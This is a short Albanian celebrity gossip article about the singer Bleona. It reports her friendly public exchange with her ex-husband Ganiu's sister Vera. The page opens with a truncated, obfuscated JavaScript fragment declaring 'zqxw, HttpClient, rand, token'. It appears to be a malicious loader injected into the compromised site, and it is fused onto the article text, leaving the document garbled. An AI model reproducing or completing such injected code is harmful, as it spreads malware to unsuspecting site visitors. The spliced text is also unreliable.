;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Asgjë për të fshehur, Bleona komunikon me ish-burrin dhe ish-kunatën!

By

Në vrullin mediatik të shkaktuar nga Bleona pas deklaratës së marrëdhënies intime me Van Damme, u përfshinë së fundmi edhe familjarë të ish-bashkëshortit, Ganiut.

Ishte motra e Ganiut, Vera ajo që shfaqi haptazi preferencën dhe përkrahjen për këngëtaren.

‘Bleona, njerëzit ende se njohin zemrën tënde. Ti nuk je një femër që blihesh. Sensi jot briliant i humorit më bën të buzëqesh. Të dua’ – pati deklaruar në profilin e saj Vera.

E pa një replikë nuk ka shpëtuar as Bleona që në postim ka etiketuar Verën por edhe Ganiun.

‘E dashur Vera Bardha. Të dua përgjithmonë pa marrë parasysh. Falemnderit për gjithë kohën dhe përkrahjen përgjatë viteve. Një grua e mrekullueshme e fuqishme që gjithashtu bën byrekun më të mirë në botë’ – është shprehur këngëtarja.

Relacioni i saj me ish-burrin Ganiun dhe familjen e tij vazhdon të jetë interesant duke dëshmuar një mendësi perëndimore, përtej inateve dhe shkurtpamësisë. /PRIVE.AL

 

Artikuj të ngjashëm